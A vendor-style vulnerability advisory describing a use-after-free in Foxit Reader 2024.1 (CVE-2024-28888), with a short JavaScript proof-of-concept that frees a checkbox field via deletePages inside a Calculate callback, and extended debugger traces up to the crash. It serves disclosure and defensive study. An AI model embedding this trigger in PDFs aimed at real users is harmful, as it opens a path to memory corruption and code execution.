Talos Vulnerability Report

TALOS-2024-1967

Foxit Reader checkbox Calculate use-after-free vulnerability

October 2, 2024
CVE Number

CVE-2024-28888

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reade 2024.1.0.23997 handles a checkbox field object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.1.0.23997

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a checkbox field object. This can be illustrated by the following proof-of-concept code:

function main() { 

 var aa = app.activeDocs[0].addField("ADD", "checkbox", 2, [17,0,5,14] ).defaultIsChecked(0);

 getField("txt3").setAction("Calculate",'delete_pages();'); 

 app.activeDocs[0].addField("ADD", "checkbox", 0, [17,0,5,14] ) ; 

}

function delete_pages(arg1, arg2, arg3) { 

  app.activeDocs[0].deletePages();  
  app.activeDocs[0].deletePages();  

}

The above code creates a checkbox field object. A callback function is assigned to the TextField object’s Calculate event, which is promptly triggered by the second call to addField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a checkbox field object is freed by deletePages() and it is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=131c5ae8 edi=160501a8
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
in javascript::Field::AddField
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=131c5ae8 edi=160501a8
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
[...]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc07 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506957:
01b0fc07 f30f5cc2        subss   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc0b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50695b:
01b0fc0b f20f101570463e05 movsd   xmm2,mmword ptr [FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::`vbtable'+0x5c574 (053e4670)] ds:002b:053e4670=7fffffffffffffff
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc13 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506963:
01b0fc13 0f5ac0          cvtps2pd xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc16 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506966:
01b0fc16 0f54c2          andps   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc19 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506969:
01b0fc19 660f5ac0        cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc1d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50696d:
01b0fc1d 0f2fc4          comiss  xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc20 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506970:
01b0fc20 0f8237040000    jb      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc26 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506976:
01b0fc26 f30f5ccb        subss   xmm1,xmm3
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2a esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697a:
01b0fc2a 0f5ac1          cvtps2pd xmm0,xmm1
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697d:
01b0fc2d 0f54c2          andps   xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc30 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506980:
01b0fc30 660f5ac0        cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc34 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506984:
01b0fc34 0f2fc4          comiss  xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc37 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506987:
01b0fc37 0f8220040000    jb      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc3d esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50698d:
01b0fc3d 8b751c          mov     esi,dword ptr [ebp+1Ch] ss:002b:076fdd6c=00000002
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc40 esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506990:
01b0fc40 c745e800000100  mov     dword ptr [ebp-18h],10000h ss:002b:076fdd38=076fdd54
0:000> pc
eax=076fdd74 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc86 esp=076fdcf4 ebp=076fdd50 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069d6:
01b0fc86 e8351a3c00      call    FoxitPDFReader!safe_vsnprintf+0x376890 (01ed16c0) ;<----------------------------------- (2)
0:000> p
eax=18babf00 ebx=076fe0dc ecx=175db036 edx=00000001 esi=00000002 edi=16426750
eip=01b0fc8b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069db:
01b0fc8b 8bf8            mov     edi,eax
0:000> dd eax
18babf00  0c8cb610 18bbf0e0 18bbf0b0 00000000
18babf10  00000000 00000000 00000000 00000000
18babf20  00000000 00000000 00000000 00000000
18babf30  00000000 00000000 00000000 00000000
18babf40  00000000 00000000 00000000 00000000
18babf50  00000000 00000000 00000000 00000000
18babf60  00000000 00000000 00000000 00000000
18babf70  00000000 00000000 00000000 00000000
0:000> dd 18bbf0e0                        ;<----------------------------------- (3)
18bbf0e0  00000003 00000000 0c8cb610 18bbf0b0
18bbf0f0  00000000 18b92af8 00000001 00000001
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00000000 18bb7c08 18bb7c20 18bb7c38
18bbf120  18bb7c50 18bbe280 18bbe2a0 18bb7c68
18bbf130  18bbe2c0 18bb7c80 18ba1c78 18bbe2e0
18bbf140  18bb7c98 18bb7cb0 18bb7cc8 18bb7ce0
18bbf150  18bb7cf8 18bb7d10 18bb7d28 18bb7d40

At (1) above, javascript::CFXJS_Document::addField_static method associated with the JavaScript API addField() is called. This method eventually calls CPDF_InterForm::CreateControl at (2). The CreateControl method creates the vulnerable buffer. The vulnerable buffer value is examined at (3).

eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=10e4c678 edi=10e69e58
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=10e4c678 edi=10e69e58
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0            call    eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
0:000> g
eax=009733f0 ebx=076fe0dc ecx=164269c8 edx=075dd000 esi=10e4c678 edi=16426b30
eip=01b0fbad esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5068fd:
01b0fbad ffd0            call    eax {FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xf3f40 (009733f0)}
0:000> g
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=10e708f0 edi=10e84008
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)}
0:000> g
ModLoad: 6afe0000 6b337000   C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
js_calls
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=12fbfb60 edi=130764b0
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)}  ;<-------------------- (4)
[...]
0:000> g
eax=076fcfe4 ebx=18bbf0b0 ecx=0c8cb610 edx=075dd000 esi=0c8cb610 edi=076fd0d4
eip=01ed21f6 esp=076fcfcc ebp=076fcfdc iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!safe_vsnprintf+0x3773c6:
01ed21f6 e845000000      call    FoxitPDFReader!safe_vsnprintf+0x377410 (01ed2240) ;<-------------------- (5)

[...]
0:000> pc
eax=00000000 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed2477 esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200297
FoxitPDFReader!safe_vsnprintf+0x377647:
01ed2477 e854f2ebff      call    FoxitPDFReader!safe_vsnprintf+0x2368a0 (01d916d0)
0:000> pc
eax=1c789aa0 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed248d esp=076fcf68 ebp=076fcfc4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x37765d:
01ed248d e80e1aecff      call    FoxitPDFReader!safe_vsnprintf+0x239070 (01d93ea0)
0:000> pc
eax=1c789aa0 ebx=076fcfe4 ecx=0c8cb674 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24a7 esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x377677:
01ed24a7 e8942a2500      call    FoxitPDFReader!safe_vsnprintf+0x5ca110 (02124f40)
0:000> pc
eax=18ba9501 ebx=076fcfe4 ecx=18bbf0e0 edx=18ba95bc esi=18bbf0e0 edi=0c8cb610
eip=01ed24b4 esp=076fcf70 ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377684:
01ed24b4 e8a7f20000      call    FoxitPDFReader!safe_vsnprintf+0x386930 (01ee1760)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24b9 esp=076fcf70 ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377689:
01ed24b9 56              push    esi                                             ;<---------------(6)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24ba esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x37768a:
01ed24ba e8e1832400      call    FoxitPDFReader!safe_vsnprintf+0x5bfa70 (0211a8a0) ;<----------- (7)
0:000> dd esi                                                       ;<----------- (8)
18bbf0e0  00000003 00000000 0c8cb610 1c789aa0  
18bbf0f0  00000000 18b92af8 00000000 00000002
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3be edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24bf esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x37768f:
01ed24bf 83c404          add     esp,4
0:000> dd esi                                                 ;<----------- (9)
18bbf0e0  00000000 00000000 0c8cb610 1c789aa0
18bbf0f0  00000000 18b92af8 00000000 00000002
18bbf100  00000000 00000004 00000000 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001

At [4] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. It calls CPDF_InterForm::DeleteField at (5). The DeleteField calls CFX_Object::operator_delete at [7] on the vulnerable buffer. At [6] , the operator_delete method argument being pushed onto the stack and it comes from the register esi. The value of the vulnerable object is examined at [8] and [9]. It shows the value before and after the operator_delete method is called. Note that, the Foxit application uses a custom allocator so the page heap is not able to mark the vulnerable buffer page. The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> p
eax=ffffffff ebx=076fe0dc ecx=175db032 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b1001f esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d6f:
01b1001f 8b4dcc          mov     ecx,dword ptr [ebp-34h] ss:002b:076fdd1c=18bbf0e0
0:000> p
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b10022 esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d72:
01b10022 e849573d00      call    FoxitPDFReader!safe_vsnprintf+0x38a940 (01ee5770)
0:000> dd ecx                                                        <------------------------ (10)
18bbf0e0  00000000 0000001f 0000001f 62626952
18bbf0f0  435f6e6f 67657461 5f79726f 74736f50
18bbf100  6e616353 6974704f 00736e6f 00000000
18bbf110  00010006 18bbf0b0 00000000 00000000
18bbf120  00000000 1c7711a0 00000010 00000002
18bbf130  18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140  00010006 18bbf0b0 00000000 00000000
18bbf150  00000000 1c7711e0 00000010 00000001
0:000> db ecx L28
18bbf0e0  00 00 00 00 1f 00 00 00-1f 00 00 00 52 69 62 62  ............Ribb
18bbf0f0  6f 6e 5f 43 61 74 65 67-6f 72 79 5f 50 6f 73 74  on_Category_Post
18bbf100  53 63 61 6e 4f 70 74 69                          ScanOpti
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01ee5770 esp=076fdcf4 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x38a940:
01ee5770 55              push    ebp
0:000> pc
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01ee5785 esp=076fdcd4 ebp=076fdcf0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x38a955:
01ee5785 e8567cffff      call    FoxitPDFReader!safe_vsnprintf+0x3825b0 (01edd3e0)
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01edd3e0 esp=076fdcd0 ebp=076fdcf0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x3825b0:
01edd3e0 55              push    ebp
0:000> pc
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01edd431 esp=076fdcb4 ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x382601:
01edd431 e8da42ebff      call    FoxitPDFReader!safe_vsnprintf+0x2368e0 (01d91710)
0:000> t
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91710 esp=076fdcb0 ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e0:
01d91710 55              push    ebp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91711 esp=076fdcac ebp=076fdccc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e1:
01d91711 8bec            mov     ebp,esp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91713 esp=076fdcac ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e3:
01d91713 51              push    ecx
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91714 esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e4:
01d91714 8d45fc          lea     eax,[ebp-4]
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91717 esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e7:
01d91717 c745fc00000000  mov     dword ptr [ebp-4],0  ss:002b:076fdca8=62626952
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171e esp=076fdca8 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ee:
01d9171e 50              push    eax
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171f esp=076fdca4 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ef:
01d9171f ff7508          push    dword ptr [ebp+8]    ss:002b:076fdcb4=076fdcc4
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91722 esp=076fdca0 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f2:
01d91722 83c110          add     ecx,10h
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626962 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91725 esp=076fdca0 ebp=076fdcac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f5:
01d91725 e8d6343900      call    FoxitPDFReader!safe_vsnprintf+0x5c9dd0 (02124c00) ;<----------------- (11)
0:000> p
(21e8.21f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000008e0 ebx=00000000 ecx=00000066 edx=00000000 esi=62626962 edi=076fdcc4
eip=02124612 esp=076fdc7c ebp=076fdc84 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608          div     eax,dword ptr [esi+8] ds:002b:6262696a=???????? ;<----------------- (12)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608          div     eax,dword ptr [esi+8]
02124615 8b450c          mov     eax,dword ptr [ebp+0Ch]
02124618 8910            mov     dword ptr [eax],edx
0212461a 8b7604          mov     esi,dword ptr [esi+4]
0212461d 85f6            test    esi,esi
0212461f 7422            je      FoxitPDFReader!safe_vsnprintf+0x5c9813 (02124643)
02124621 8b3496          mov     esi,dword ptr [esi+edx*4]
02124624 85f6            test    esi,esi
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 076fdc84 02124c10     076fdcc4 076fdc94 62626962 FoxitPDFReader!safe_vsnprintf+0x5c97e2
01 076fdc98 01d9172a     076fdcc4 076fdca8 00000000 FoxitPDFReader!safe_vsnprintf+0x5c9de0
02 076fdcac 01edd436     076fdcc4 18bbf0e0 00000000 FoxitPDFReader!safe_vsnprintf+0x2368fa
03 076fdccc 01ee578a     62626952 0539e638 00000000 FoxitPDFReader!safe_vsnprintf+0x382606
04 076fdcf0 01b10027     00000000 175db18a 16426b30 FoxitPDFReader!safe_vsnprintf+0x38a95a
05 076fdd50 0113e5ce     076fdc01 40a00000 41880000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d77
06 076fdd9c 02d6eb05     076fdd74 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0x3574e
07 076fde88 02d0f51a     1035bbc8 00000000 00000002 FoxitPDFReader!safe_vsnprintf+0x1213cd5
08 076fdfa0 02cc3529     10e69e58 076fe068 076fdfe8 FoxitPDFReader!safe_vsnprintf+0x11b46ea
09 076fe040 030956eb     10e69e58 076fe070 076fe068 FoxitPDFReader!safe_vsnprintf+0x11686f9
0a 076fe088 03279a6b     15bb20a0 18a69525 15bb20a0 FoxitPDFReader!FXJSE_GetClass+0x26b
0b 076fe0f0 0327922e     076fe138 18a69525 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
0c 076fe184 032794e5     076fe1b4 15bb20a0 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
0d 076fe1cc 0327936b     076fe1e4 00000009 076fe22c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
0e 076fe1e8 0349b17b     00000009 076fe22c 15bb20a0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
0f 076fe204 034371d9     292c2339 3d252161 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
